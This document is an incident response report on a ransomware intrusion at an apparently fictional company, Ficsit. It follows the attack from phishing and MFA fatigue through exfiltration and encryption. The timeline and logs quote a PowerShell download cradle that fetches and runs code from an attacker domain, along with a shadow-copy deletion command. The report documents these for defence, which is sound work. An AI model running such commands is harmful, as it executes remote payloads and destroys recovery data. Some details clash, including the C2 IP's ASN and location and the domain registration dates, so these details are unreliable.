CONFIDENTIAL  //  TLP:AMBER  //  Handle via need-to-know only — Ficsit Inc. Internal
Incident Response Report  ·  Ficsit Inc. Pioneer Division
Operation IRON CHIMNEY
AiTM Phishing · IRONLOCK v2.1 Ransomware · MFA Fatigue · Double Extortion — Full forensic incident report covering initial access through containment and recovery planning.
Report ID
RPT-2026-0087
SIEM Investigation
INV-2024-0087
SOAR Case
CASE-2024-0267
Severity
Critical — 94/100
Status
Active — Contain Phase
Threat Actor
IRON CHIMNEY (TA-001)
Incident Date
May 27, 2026
Report Date
May 27, 2026 · 16:00 UTC
Lead Analyst
pioneer (Security Analyst)
Incident Commander
j.rodriguez (IR Lead)
Classification
CONFIDENTIAL // TLP:AMBER
Distribution
Security, Legal, Executive
Section 01
Executive Summary
847
Files encrypted
547 MB
Data exfiltrated
2
Accounts compromised
3
SOAR playbooks triggered
<4 min
Detection to alert
14 min
Detection to isolation

On May 27, 2026, Ficsit Inc. Pioneer Division sustained a sophisticated, multi-stage cyberattack attributed with high confidence to IRON CHIMNEY (TA-001), an Eastern European ransomware-as-a-service (RaaS) operator. The attack chain began at 10:09 UTC with a targeted spearphishing email (THREAT-001) delivering a macro-enabled Excel dropper (MAM_Update_Q4_2026.xlsm) to the pioneer account. The lure was purpose-crafted to exploit knowledge of Ficsit's internal M.A.M. (Material Acquisition & Management) research project — intelligence likely obtained during pre-attack reconnaissance activity spanning at least 7 days prior.

The attacker employed an Adversary-in-the-Middle (AiTM) phishing proxy hosted at pioneer-updates.svc.net (resolving to C2 IP 185.220.101.47) to intercept and replay the authentication session token for the pioneer account, entirely bypassing multi-factor authentication. A concurrent but independent attack vector compromised executive account m.blake through an MFA fatigue / push-bombing campaign, allowing the attacker to enumerate internal host inventory, user directories, and full network subnet topology via the Ficsit Admin Portal — reconnaissance directly leveraged to deploy a targeted ransomware payload.

At 14:28 UTC, a PowerShell encoded download cradle executed on RESEARCH-STATION-01, pulling IRONLOCK v2.1 ransomware from a typosquatted staging domain (update-cdn.ficsit-external.com). Prior to encryption, 547 MB of research data was exfiltrated to the attacker's C2 server via Rclone — confirming a double-extortion strategy designed to apply financial pressure even if backup recovery is available. At 14:31 UTC, 847 files were encrypted with the .encrypted extension within 4 minutes. The process also deleted Volume Shadow Copies (VSS) to impede recovery and created a scheduled task for persistence.

RESEARCH-STATION-01 was isolated from the FICSIT-NET backbone at 14:45 UTC — 14 minutes after initial ransomware detection. Factory operations, HUB systems, and production infrastructure were not affected. Three SOAR playbooks executed automatically across the incident: PB-001 (AiTM Phishing Response), PB-002 (MFA Fatigue Lockdown), and PB-003 (Ransomware Containment). Ficsit Corp Security & Legal were notified at 15:15 UTC. A forensic disk image of RESEARCH-STATION-01 is in progress. No ransom has been paid; no decryption key has been received.

Key Finding
The attacker's use of purpose-built M.A.M.-themed lures — combined with pre-attack credential phishing (THREAT-025) and malware delivery (THREAT-021) from the same C2 infrastructure — indicates a deliberate, targeted campaign against Ficsit Pioneer Division, not an opportunistic attack. The attacker possessed insider knowledge of internal project names and terminology prior to the initial access event.
Section 02
Incident Overview
Incident IDINV-2024-0087
SOAR CaseCASE-2024-0267
Incident NameRansomware Activity — Research & Development (IRON CHIMNEY)
Operation NameOperation SMELTING (IRON CHIMNEY internal designation)
Threat ActorIRON CHIMNEY (TA-001) — Eastern European RaaS operator
Incident TypeT-RANSOM: Ransomware with Pre-Encryption Exfiltration (Double Extortion)
Attack VectorsAiTM Phishing (T1566.001), MFA Fatigue (T1110.003), PowerShell Execution (T1059.001), Ransomware (T1486)
Severity Score94 / 100 — Critical
StatusACTIVE — Contain Phase (forensic imaging in progress)
First AlertMay 27, 2026 · 10:09 UTC — ALT-7272 (AiTM Session Hijack)
Ransomware AlertMay 27, 2026 · 14:31 UTC — ALT-7291 (File Extension Mass-Rename)
Investigation CreatedMay 27, 2026 · 14:35 UTC (SIEM auto-correlation)
Isolation CompletedMay 27, 2026 · 14:45 UTC
Attack Duration10:09 – 14:35 UTC (4 hours 26 minutes)
Lead Analystpioneer (Security Analyst)
Incident Commanderj.rodriguez (IR Lead)
Affected SystemsRESEARCH-STATION-01, PIONEER-WS-01, FICSIT-HUB-CORE (m.blake session)
Files Encrypted847 files (.encrypted extension) on RESEARCH-STATION-01
Data Exfiltrated547 MB (Rclone to 185.220.101.47:443); additional 14.7 GB via compromised Dropbox account (pending confirmation)
Compromised Accountspioneer@ficsit-pioneer.corp (AiTM), m.blake@ficsit-pioneer.corp (MFA fatigue)
Ransomware FamilyIRONLOCK v2.1 (IRON CHIMNEY proprietary); SHA256: a3f8d4c2…7e2b
Regulatory NotificationPending legal review — potential data breach notification required
Data SensitivityHigh — M.A.M. research notes, SCADA configurations, facility blueprints, xenobiology data
Business ImpactR&D files unavailable; no factory or production systems affected
Ransom DemandNot yet received; ransom note (README_DECRYPT.txt) dropped in all affected directories
Payment StatusNo payment made; policy prohibits ransomware payment without explicit Board authorization
Section 03
Timeline of Events

The following timeline covers all security events from the earliest known attacker activity (May 19, 2026) through the current containment phase. Times are UTC.

Pre-Attack Reconnaissance Phase (May 19–26, 2026)
May 1907:30
Recon
VPN brute force targeting pioneer and m.blake accounts from 91.134.77.22 — 8,420 failed attempts over 2 hours. Account lockout triggered. No successful logins confirmed. (INV-2024-0076)
May 2016:08
Recon
THREAT-025: Credential phishing email targeting pioneer@ficsit-pioneer.corp from ficsit-account-verify.com. Originating IP 185.220.101.47 — same infrastructure as the May 27 attack. Blocked. Attacker was actively testing phishing templates against the pioneer account.
May 21~09:00
Infrastructure
Typosquat domain pioneer-updates.svc.net registered (WHOIS: NameSilo, registrant hidden behind WhoisGuard). 6 days before the main attack. This domain was used as the AiTM phishing proxy on attack day.
May 21~09:00
Infrastructure
Typosquat domain update-cdn.ficsit-external.com registered. Used on attack day as the payload staging server for the IRONLOCK download cradle.
May 2214:17
Delivery Attempt
THREAT-021: Malware PDF targeting pioneer@ficsit-pioneer.corp. Subject: "Research Digest: M.A.M. Platform Developments — May 2026". Payload: MAM_Research_Digest_May2026.pdf containing embedded exploit (CVE-2023-21716). Originating IP: 185.220.101.47. Quarantined. This confirms the attacker had prior knowledge of the M.A.M. project name.
Attack Day — May 27, 2026
01:44
Unauthorized Access
ALT-7295 / INV-2024-0081: Successful authentication to FICSIT-HUB-CORE from pioneer account from residential VPN IP 92.118.37.91. Outside business hours (08:00–20:00 UTC). Two R&D files accessed: MAM-Field-Notes-2026.docx and pioneer-access-log-2026.xlsx. Pioneer confirmed they were asleep — session not initiated by legitimate user. This may represent the attacker using previously obtained pioneer credentials for pre-attack reconnaissance of R&D files.
09:10
Phishing Campaign
ALT-7296 / INV-2024-0080: Phishing campaign targeting 14 Engineering Division employees. Sender spoofed as Ficsit IT Help Desk (helpdesk@ficsit-corp-it.com). Subject: "Urgent: Password Reset Required." Credential harvesting page at ficsit-it-portal.com. 2 employees clicked; 1 (svc-factory) submitted credentials. Appears to be a concurrent attack by a different actor, or an IRON CHIMNEY diversionary tactic.
10:09
Initial Access
THREAT-001: Spearphishing email delivered to pioneer@ficsit-pioneer.corp. Sender: "Ficsit Research Platform" <updates@pioneer-updates.svc.net>. Subject: "M.A.M. Research Platform — Q4 Update Required." Attachment: MAM_Update_Q4_2026.xlsm (macro-enabled Excel, 487 KB). Domain pioneer-updates.svc.net registered 6 days prior. DMARC FAIL despite SPF/DKIM PASS (domain mismatch). Originating IP: 185.220.101.47. ALT-7272 fired: AiTM Session Hijack — session cookie for pioneer account intercepted and replayed. MFA bypassed. SOAR PB-001 triggered automatically.
10:14
Execution
Pioneer opens MAM_Update_Q4_2026.xlsm and enables macros. Macro executes PowerShell stager that connects to C2 185.220.101.47. Session cookie intercepted by AiTM proxy at pioneer-updates.svc.net. Account risk score elevated to 94 (ATO-001). SOAR PB-001 executing: sessions revoked, phishing domain blocked at NGFW, SOC notified.
11:55
Pre-Exfil Staging
ALT-7299 / INV-2024-0079: 3.2 GB of R&D files bulk-copied from multiple project directories to staging folder \\FICSIT-FS-01\RnD\tmp\archive_2026\ over 45 minutes using the pioneer account (1,247 files). Contents: M.A.M. research notes, alien xenobiology data, SCADA config exports, facility blueprints. Activity occurring under compromised pioneer session — likely attacker staging data for subsequent exfiltration.
14:10
MFA Fatigue
ALT-7285 / INV-2024-0086: 3 consecutive MFA authentication push notifications rejected for executive account m.blake from external IP 203.0.113.88 within 7 minutes. Pattern consistent with MFA fatigue / push-bombing attack. IP 203.0.113.88 shares ASN with C2 IP 185.220.101.47. SOAR PB-002 queued.
14:17
Account Compromise
ALT-7288: Successful MFA authentication for m.blake from 203.0.113.88 — 7 minutes after 3 consecutive push rejections. 4th push notification accepted, likely due to push fatigue. Admin Portal session established (session ID: bae941f2, 22 minutes). Session activity: 14 host inventory API calls (/api/v1/inventory/hosts), 6 user directory calls (/api/v1/directory/users), 1 subnet map export (/api/v1/network/subnet-map) — systematic internal reconnaissance used to tailor the ransomware deployment.
14:28
Execution
ALT-7278: PowerShell encoded command executed on RESEARCH-STATION-01 (user: pioneer). Decoded payload:
iex (New-Object System.Net.WebClient).DownloadString('http://update-cdn.ficsit-external.com/mam/latest/update.ps1')
Staging domain update-cdn.ficsit-external.com registered 3 days prior. Download cradle pulled IRONLOCK v2.1 ransomware payload. Simultaneous: ALT-7287 — 547 MB exfiltrated from PIONEER-WS-01 to 185.220.101.47:443 over 183 seconds (Rclone). Firewall alert fired; traffic not blocked pending rule confirmation.
14:31
Ransomware Execution
ALT-7291 — CRITICAL: EDR detected 847 files renamed to .encrypted extension in 238 seconds (under 4 minutes) by unsigned process pioneer_research_tool.exe (SHA256: a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7). Ransom note README_DECRYPT.txt dropped in all affected directories. Scheduled task \Microsoft\Windows\Update\Updater created for persistence. Shadow copies deleted (vssadmin.exe). Process quarantined by EDR.
14:35
Detection
INV-2024-0087 auto-created by SIEM correlation engine. Alerts ALT-7291, ALT-7287, ALT-7278 linked. SOAR PB-003 (Ransomware Containment) triggered automatically.
14:37
Response
pioneer assigned to investigation. Status set ACTIVE. Analyst begins triage of correlated alerts.
14:42
Response
Log query confirmed: 847 files renamed in 4-minute window. Binary pioneer_research_tool.exe confirmed unsigned and absent from software inventory. SHA256 submitted to threat intelligence for cross-referencing.
14:45
Containment
RESEARCH-STATION-01 isolated from FICSIT-NET backbone. Factory, HUB, and production segments unaffected. Network isolation prevents any further C2 communication or lateral movement from the endpoint.
14:47
Containment
m.blake session revoked. All active sessions invalidated. Account suspended. Step-up authentication enforced on all Admin Portal access. SOAR PB-002 completed: force MFA re-enrollment queued.
14:50
Intel
IOC 185.220.101.47 added to Ficsit threat intelligence. Cross-referenced: confirmed Tor exit node (AS44901/Blazingfast LLC), listed on abuse.ch Feodo Tracker. Associated with IRON CHIMNEY ransomware operations targeting industrial networks.
15:00
Correlation
IP 185.220.101.47 confirmed in both INV-2024-0087 and INV-2024-0086. IP 203.0.113.88 (m.blake MFA attack) confirmed to share ASN with 185.220.101.47. Analyst note: "Timeline suggests executive account was compromised first, enumerated internal resources, then a tailored payload was delivered. Treating both as a single coordinated campaign."
15:15
Escalation
Ficsit Corp Security & Legal notified. Executive briefing requested within 2 hours. Incident Commander j.rodriguez formally assigned.
15:30
Update
Severity score confirmed 94/100. Priority escalated to CRITICAL. Forensic disk image of RESEARCH-STATION-01 initiated (in progress).
Section 04
Technical Analysis — Attack Chain

The IRON CHIMNEY attack against Ficsit Pioneer Division followed a structured, multi-phase kill chain spanning at least 7 days of pre-attack preparation. The attack is notable for its use of two independent initial access vectors executed in parallel — an AiTM phishing attack against a research analyst account and an MFA fatigue attack against an executive account — with intelligence gathered from the second used to tailor the ransomware payload delivered through the first.

Initial Access
AiTM Phishing / Session Hijack
T1566.001
Execution
Malicious Macro + PowerShell Cradle
T1204.002
Persistence
Scheduled Task
T1053.005
Defense Evasion
Encoded Commands + VSS Delete
T1140
Credential Access
LSASS Dump Attempt + MFA Fatigue
T1003.001
Discovery
Network + User Enumeration
T1016
Collection
Data Staging (3.2 GB R&D)
T1074.001
Exfiltration
Rclone to C2 (547 MB)
T1048.002
Impact
IRONLOCK v2.1 Ransomware
T1486
4.1 Initial Access (T1566.001 — Spearphishing Attachment)

The primary initial access vector was a spearphishing email (THREAT-001) crafted to exploit specific knowledge of Ficsit's M.A.M. (Material Acquisition & Management) research platform. The email was delivered at 10:09 UTC on May 27, 2026, to pioneer@ficsit-pioneer.corp from the spoofed display name "Ficsit Research Platform" using the attacker-controlled domain pioneer-updates.svc.net.

Critically, this email employed an Adversary-in-the-Middle (AiTM) phishing technique rather than a simple credential harvesting page. The phishing link routed the victim's authentication through an attacker-controlled transparent proxy, allowing the adversary to intercept the authenticated session token in real time — entirely bypassing MFA, as the token was captured post-authentication.

Email authentication analysis: SPF PASS and DKIM PASS were obtained for pioneer-updates.svc.net (the attacker's own domain), however DMARC FAILED due to misalignment with the legitimate ficsit-pioneer.corp domain. The originating IP 185.220.101.47 was embedded in the email headers and subsequently confirmed as a known IRON CHIMNEY C2 node.

Finding
The DMARC failure was detectable at the gateway but the email was delivered because the M.A.M.-specific subject and attachment name were sufficiently convincing to pass human review. A stricter DMARC reject policy on ficsit-pioneer.corp would not have blocked this email (attacker used their own domain), but enhanced BEC/impersonation detection heuristics may have flagged the display name discrepancy.
4.2 Execution (T1204.002, T1059.001)

The phishing attachment MAM_Update_Q4_2026.xlsm was a macro-enabled Excel file (487 KB). When the victim opened the file and enabled macros, a VBA macro executed a PowerShell command that downloaded and ran a first-stage stager from the AiTM proxy server. The macro body decoded a base64-encoded PowerShell download cradle:

Decoded PowerShell Macro Payload (from EDR telemetry)
iex (New-Object System.Net.WebClient).DownloadString('http://update-cdn.ficsit-external.com/mam/latest/update.ps1')

A second, distinct execution event occurred at 14:28 UTC when a separate PowerShell encoded command executed on RESEARCH-STATION-01. This encoded command (observed in Windows Event ID 4688) used a different staging URL and was likely the primary IRONLOCK payload delivery mechanism:

EDR Log — PowerShell Encoded Command (ALT-7278)
2026-05-27T14:28:33Z  RESEARCH-STATION-01  WinEvent  EventID=4688
  SubjectUserName=pioneer  SubjectDomainName=FICSIT
  NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessName=C:\Windows\System32\cmd.exe  pid=3201  ppid=2440
  CommandLine=powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden
    -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcw...

  [EDR DECODE] Base64 payload resolves to:
  iex (New-Object System.Net.WebClient).DownloadString(
    'http://update-cdn.ficsit-external.com/mam/latest/update.ps1')
4.3 Persistence (T1053.005 — Scheduled Task)

IRONLOCK v2.1 created a persistence mechanism via a Windows Scheduled Task named \Microsoft\Windows\Update\Updater — designed to blend in with legitimate Windows Update scheduler entries. The task was configured to re-execute the PowerShell payload on system startup and at user logon, ensuring the ransomware or its C2 communication mechanism would survive a reboot.

This persistence mechanism was observed in the EDR telemetry immediately following the mass file rename event and was flagged in ALT-7291. The scheduled task was confirmed and quarantined as part of SOAR PB-003 execution. No evidence of the task executing post-containment.

4.4 Defense Evasion (T1140, T1490)

IRON CHIMNEY employed multiple defense evasion techniques:

Encoded Commands: All PowerShell payloads were delivered via base64-encoded -EncodedCommand parameter to evade simple string-based detection rules that look for plaintext download URLs.

VSS Shadow Copy Deletion (T1490): IRONLOCK deleted Volume Shadow Copies using vssadmin.exe delete shadows /all /quiet immediately prior to initiating file encryption. This prevents victim recovery via Windows Previous Versions and removes a key recovery path without requiring decryption keys. EDR telemetry captured this execution event as part of the ransomware process chain from pioneer_research_tool.exe.

Masquerading (T1036): The ransomware binary was named pioneer_research_tool.exe — mimicking a legitimate Pioneer Division research utility. The scheduled task was placed in the \Microsoft\Windows\Update\ namespace. Both choices indicate deliberate effort to blend into expected system activity.

Process Injection: The ransomware process spawned from cmd.exe, which is consistent with execution via the PowerShell download cradle rather than direct execution — adding one level of process ancestry obfuscation.

4.5 Credential Access (T1003.001, T1110.003)

Two credential access techniques were employed in this incident:

LSASS Memory Dumping (T1003.001): EDR detection DET-0040 on PIONEER-WS-01 flagged a blocked LSASS credential dump attempt by the attacker process. The EDR agent intercepted the process memory read of lsass.exe and blocked it successfully. This suggests the attacker attempted to harvest additional account credentials to expand their foothold or facilitate lateral movement — possibly targeting service account credentials stored in memory.

MFA Fatigue / Push Bombing (T1110.003): The m.blake account was targeted through persistent MFA push notification spam — sending 3 notifications in 7 minutes until the user accepted the 4th. This technique exploits user fatigue and the assumption that an unexpected push may be a system glitch. The 22-minute admin session that followed was used for systematic internal reconnaissance. This attack vector ran concurrently and independently of the pioneer AiTM attack, demonstrating a sophisticated dual-pronged approach.

4.6 Discovery (T1016, T1087, T1046)

Internal reconnaissance was conducted via the compromised m.blake admin portal session between 14:17 and 14:39 UTC. The attacker made 21 API calls to the Ficsit Admin Portal:

TimeAPI EndpointCallsIntelligence Gathered
14:17–14:30/api/v1/inventory/hosts14Full host inventory — all hostnames, IPs, OS versions, roles
14:18–14:33/api/v1/directory/users6User directory — all accounts, roles, email addresses
14:20/api/v1/network/subnet-map1Complete internal network topology export

This reconnaissance directly informed the attacker's targeting decision — RESEARCH-STATION-01 was subsequently identified as the ransomware deployment target, consistent with its role as the primary R&D workstation in the host inventory. The subnet map export would have revealed network segmentation, enabling the attacker to avoid production and factory segments that were more likely to trigger rapid detection.

Additionally, an internal network scan (DET-0035, nmap) was observed from a compromised endpoint prior to the ransomware execution phase, consistent with lateral movement preparation.

4.7 Collection (T1074.001, T1119)

Prior to exfiltration, the attacker staged 3.2 GB of R&D files into a single archive directory (\\FICSIT-FS-01\RnD\tmp\archive_2026\) over a 45-minute window between 11:55 and 12:40 UTC. This activity was attributed to the pioneer account and detected as ALT-7299 / INV-2024-0079.

Files staged include material of significant research and operational sensitivity:

FileSource DirectorySensitivity
MAM-Field-Notes-2026.docx\RnD\Xenobiology\High — M.A.M. research data
alien-consciousness-draft-v7.pdf\RnD\M.A.M.Research\High — proprietary research
scada-config-export-all-zones.xlsx\RnD\Facilities\Critical — OT/SCADA configs
pioneer-facility-blueprint-q2.dwg\RnD\Engineering\High — facility blueprints

Whether these staged files were subsequently included in the 547 MB exfiltration payload is under active investigation (INV-2024-0079 task: "Determine if staged files were subsequently exfiltrated").

4.8 Exfiltration (T1048.002)

At 14:28 UTC, 547 MB of data was transferred from PIONEER-WS-01 to C2 IP 185.220.101.47:443 over 183 seconds (approximately 3 minutes). The transfer volume (573,741,824 bytes) and destination IP were detected by firewall alert ALT-7287. The traffic was routed on port 443 using TLS, consistent with Rclone — a legitimate cloud sync tool commonly misused by ransomware actors for exfiltration (T1567).

Firewall Log — Exfiltration Event (ALT-7287)
May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutboundTransfer|HIGH
  src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP
  bytes_out=573741824 bytes_in=1802 duration_sec=183
  geo_dst="NL/Tor exit node"  asn_dst=AS60068 (CDN77)
  flow_id=a9f3d21c-4481  rule_matched="Exfil::LargeOutbound>500MB"

May 27 14:31:18 FICSIT-FW-CORE IDS-ALERT: Signature 2025441 "ET TROJAN Ransomware C2 Beacon"
  src=10.0.1.42 dst=185.220.101.47 sid=2025441 priority=1
  note: not blocked — firewall rule pending confirmation at time of alert

The firewall alert fired but traffic was not blocked pending manual rule confirmation — a critical gap in automated response. SOAR PB-003 subsequently pushed an automated firewall block rule for 185.220.101.47, but this occurred after exfiltration had already completed. A 14.7 GB exfiltration via a compromised Dropbox account (attributed to m.blake) is also under investigation and may represent a secondary exfiltration channel.

Critical Gap
The firewall rule requiring manual confirmation for outbound blocks allowed the exfiltration to complete despite an active IDS alert matching a known ransomware C2 signature. Automating firewall response for confirmed C2 IPs from threat intelligence feeds would have reduced or eliminated exfiltration loss.
4.9 Impact (T1486 — Data Encrypted for Impact)

IRONLOCK v2.1 ransomware (process name: pioneer_research_tool.exe, SHA256: a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7) encrypted 847 files on RESEARCH-STATION-01 in 238 seconds using a targeted, directory-aware encryption approach consistent with IRON CHIMNEY's known tooling.

Encrypted file types include research documents (.docx, .pdf, .xlsx), engineering files (.dwg), configuration exports (.xlsx, .ini), and research data archives. A ransom note README_DECRYPT.txt was deposited in every affected directory. All Volume Shadow Copies were deleted prior to encryption, eliminating Windows-native recovery paths.

No factory controllers, SCADA systems, or production databases were impacted. The encryption was contained to RESEARCH-STATION-01 and the staged R&D share. Network isolation at 14:45 UTC prevented any potential lateral spread to additional endpoints.

Section 05
Threat Actor Profile — IRON CHIMNEY (TA-001)
Internal IDTA-001
Common NameIRON CHIMNEY
TypeRansomware-as-a-Service (RaaS) operator
OriginEastern Europe (high confidence)
Active SinceEstimated 2022
Primary MotivationFinancial — ransom payments and data extortion
Primary TargetsIndustrial / manufacturing, research institutions, mid-market enterprises
Known ToolingIRONLOCK ransomware family (v1.x–v2.1), Rclone for exfiltration, Cobalt Strike for C2
Confirmed C2 Infrastructure185.220.101.47 (Tor exit node, AS44901/Blazingfast LLC); 203.0.113.88 (same ASN, MFA attack)
Known Domainspioneer-updates.svc.net, update-cdn.ficsit-external.com, d3adbeef123456789.update.microsoft-cdn-verify.net (C2)
Extortion ModelDouble extortion — data exfiltrated before encryption; payment demanded for both decryption key and non-publication of stolen data
Average Ransom$250,000–$2.1M USD (historical range from disclosed incidents)
Intel Sourcesabuse.ch Feodo Tracker, internal TIP, cross-industry threat sharing (TIP IOC-001–014)
Attribution ConfidenceHigh — C2 IP overlap, IRONLOCK v2.1 signature, M.A.M. lure indicating prior OSINT on target

IRON CHIMNEY is a financially motivated RaaS group that leases its IRONLOCK ransomware platform to affiliates in exchange for a percentage of ransom proceeds. The group is notable for conducting detailed pre-attack reconnaissance on targets — typically gathering internal project names, key personnel, and network architecture before deploying lures. The M.A.M.-themed phishing content in this incident is consistent with this behavioral pattern.

The group has been observed previously targeting industrial research facilities and manufacturing operations where OT/SCADA data has high exfiltration value for secondary extortion. The inclusion of SCADA configuration exports in the staged data strongly suggests the attackers intended to leverage this data as additional leverage in ransom negotiations.

Section 06
MITRE ATT&CK Mapping
TacticTechniqueIDObserved Behavior
ReconnaissanceGather Victim Org InfoT1591OSINT on M.A.M. project; Pioneer Division employee targeting; pre-attack credential phishing
Resource Dev.Acquire Infrastructure: DomainsT1583.001pioneer-updates.svc.net, update-cdn.ficsit-external.com, ficsit-account-verify.com registered pre-attack
Initial AccessPhishing: Spearphishing AttachmentT1566.001MAM_Update_Q4_2026.xlsm delivered via AiTM proxy (THREAT-001)
Initial AccessValid AccountsT1078Session token replay post-AiTM interception; m.blake MFA compromise
ExecutionUser Execution: Malicious FileT1204.002Pioneer enabled macros on MAM_Update_Q4_2026.xlsm
ExecutionCommand and Scripting: PowerShellT1059.001Encoded PowerShell download cradle; IRONLOCK deployment
PersistenceScheduled Task/JobT1053.005\Microsoft\Windows\Update\Updater scheduled task created by ransomware
Defense EvasionDeobfuscate/Decode FilesT1140Base64-encoded PowerShell payloads
Defense EvasionMasqueradingT1036pioneer_research_tool.exe; Update namespace scheduled task
Defense EvasionInhibit System RecoveryT1490VSS shadow copy deletion pre-encryption
Credential AccessOS Credential Dumping: LSASST1003.001Blocked LSASS dump attempt on PIONEER-WS-01 (DET-0040)
Credential AccessBrute Force: MFA FatigueT1110.0033 consecutive MFA push denials then acceptance on m.blake (ALT-7285)
DiscoverySystem Network ConfigurationT1016Subnet map exported via m.blake Admin Portal session
DiscoveryAccount DiscoveryT1087User directory queries via m.blake session (6 calls)
DiscoveryRemote System DiscoveryT1018Host inventory API queries via m.blake session (14 calls)
DiscoveryNetwork Service ScanningT1046Internal nmap sweep (DET-0035)
CollectionData Staged: Local Data StagingT1074.0013.2 GB R&D files staged to \RnD\tmp\archive_2026 (ALT-7299)
CollectionAutomated CollectionT1119Bulk file staging across multiple R&D directories
C&CApplication Layer Protocol: WebT1071.001HTTPS C2 beaconing to 185.220.101.47:443
ExfiltrationExfil Over C2 ChannelT1041547 MB exfiltrated via Rclone to C2 over port 443
ImpactData Encrypted for ImpactT1486IRONLOCK v2.1 — 847 files encrypted in 238 seconds
Section 07
IOC Inventory

All IOCs below should be blocklisted at perimeter, NGFW, DNS resolver, email gateway, and endpoint layers. High-confidence IOCs are already pushed via SOAR PB-003. All hashes are SHA256.

TypeValueConfidenceDescription
IP Address 185.220.101.47 Confirmed Primary C2 — Tor exit node, AS44901/Blazingfast LLC, Moscow. C2 beaconing, AiTM proxy, exfiltration destination. Listed on abuse.ch Feodo Tracker.
IP Address 203.0.113.88 Confirmed MFA fatigue attack source for m.blake. Shares ASN with 185.220.101.47. Assessed as same threat actor infrastructure.
Domain pioneer-updates.svc.net Confirmed AiTM phishing proxy domain. Registered 2026-05-21, 6 days pre-attack. Hosted on 185.220.101.47. Typosquat mimicking Ficsit Pioneer infrastructure.
Domain update-cdn.ficsit-external.com Confirmed Payload staging domain for IRONLOCK download cradle. Registered 2026-05-24, 3 days pre-attack. Mimics Ficsit external CDN.
Domain d3adbeef123456789.update.microsoft-cdn-verify.net High Known IRON CHIMNEY C2 domain from prior campaigns. DGA-style subdomain. Not observed in this incident but associated with same group.
Domain ficsit-account-verify.com Confirmed Pre-attack credential phishing domain (THREAT-025, May 20). Registered pre-attack. Hosted on 185.220.101.47. Confirmed early reconnaissance phase.
File Hash a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7 Confirmed pioneer_research_tool.exe — IRONLOCK v2.1 ransomware encryptor binary. Unsigned. Not in software inventory. AV: Trojan:Win32/IronLock.2.1
File Hash b9c2e7f4a1d3e031c8f5a4b7e2d9c1f6a3b8e5d2c7f4a1b0e3d8c5f2a9b6e1 Confirmed README_DECRYPT.txt dropper — ransom note generator. Deposited in all directories containing encrypted files.
File Hash a3f8c1d2e4b5a9f0c7e3d6b8a1f4c2e5d9b3a7f0c4e8d1b5a2f6c3e7d0b4a8 Confirmed MAM_Update_Q4_2026.xlsm — phishing attachment. AV: Trojan:X97M/Powerdrop.A, HEUR:Trojan.Script.Generic
Sched. Task \Microsoft\Windows\Update\Updater Confirmed Persistence scheduled task created by IRONLOCK. Executes PowerShell payload on system startup and user logon. Removed by SOAR PB-003.
Email updates@pioneer-updates.svc.net Confirmed Sending address for THREAT-001. Spoofed display name "Ficsit Research Platform." Blocklisted at email gateway.
Email external@threatactor.net High External address that received outbound email from compromised pioneer account (THREAT-004). Threat actor controlled.
URL hxxps://pioneer-updates[.]svc[.]net/portal/verify Confirmed AiTM phishing landing page. Proxied authentication to capture session tokens. Defanged for safe sharing.
URL http://update-cdn[.]ficsit-external[.]com/mam/latest/update.ps1 Confirmed IRONLOCK payload staging URL. PowerShell download cradle target. Domain now sinkholed.
Account m.blake@ficsit-pioneer.corp Confirmed Executive account compromised via MFA fatigue. Used for internal reconnaissance. Account suspended, sessions revoked, MFA re-enrollment forced.
Section 08
Affected Assets
HostnameIPRoleImpactStatus
RESEARCH-STATION-01 192.168.3.45 R&D Workstation (primary ransomware target) 847 files encrypted (.encrypted). VSS deleted. Scheduled task created. Ransom note dropped. Isolated — forensic imaging in progress
PIONEER-WS-01 10.0.1.42 Pioneer analyst workstation 547 MB data exfiltrated. LSASS dump blocked. PowerShell cradle executed. 3.2 GB R&D files staged. Under investigation — not yet isolated
FICSIT-HUB-CORE Central hub / admin portal m.blake admin session established from external IP. Internal host inventory, user directory, subnet map exported. Session terminated — no persistent access confirmed

Factory controllers (FACTORY-CTRL-NORTH, FACTORY-CTRL-SOUTH), domain controllers (FIC-DC-01), Exchange (FIC-EXCH-01), web server (FIC-WEB-01), and all other production systems were not affected. Network segmentation between the R&D segment and factory/production segments is assessed to have been the primary containment factor that prevented operational impact.

Section 09
Containment & Eradication Actions
TimeActionByStatus
14:35 UTCSOAR PB-003 triggered — ransomware containment playbookAutomated (SOAR)Completed
14:37 UTCSIEM investigation INV-2024-0087 opened; pioneer assignedSIEM auto + pioneerCompleted
14:42 UTCRansomware binary confirmed unsigned; SHA256 submitted for analysispioneerCompleted
14:45 UTCRESEARCH-STATION-01 network isolated from FICSIT-NET backboneSOAR PB-003 / pioneerCompleted
14:47 UTCm.blake account suspended; all sessions revoked; step-up auth enabled on Admin PortalSOAR PB-002 / a.ficsitCompleted
14:47 UTCpioneer account sessions revoked; MFA re-enrolledSOAR PB-001Completed
14:50 UTCC2 IP 185.220.101.47 blocklisted at NGFW; DNS sinkholedSOAR PB-003 / SEC-013Completed
14:50 UTCPhishing domain pioneer-updates.svc.net blocked at NGFW and email gatewaySOAR PB-001Completed
14:55 UTCStaged R&D archive folder (RnD\tmp\archive_2026) quarantined pending investigationpioneerCompleted
15:00 UTCAll IRON CHIMNEY IOCs pushed to email gateway, DNS, NGFW via threat intelligence feedSOAR PB-003Completed
15:15 UTCFicsit Corp Security & Legal notified; executive briefing requestedpioneer / j.rodriguezCompleted
15:30 UTCForensic disk image of RESEARCH-STATION-01 initiatedIR teamIn Progress
PendingFull forensic review of PIONEER-WS-01 (exfiltration source)UnassignedNot Started
PendingQuantify exact scope of exfiltrated data — identify all exfiltrated filesUnassignedNot Started
PendingRestore R&D files from pre-incident backup snapshotUnassignedNot Started
PendingPDN-SRV-008 restore from backup (Queue: PLAT-008)UnassignedNot Started
PendingDraft executive briefing for Ficsit Corp leadershipUnassignedNot Started
Section 10
Automated SOAR Response

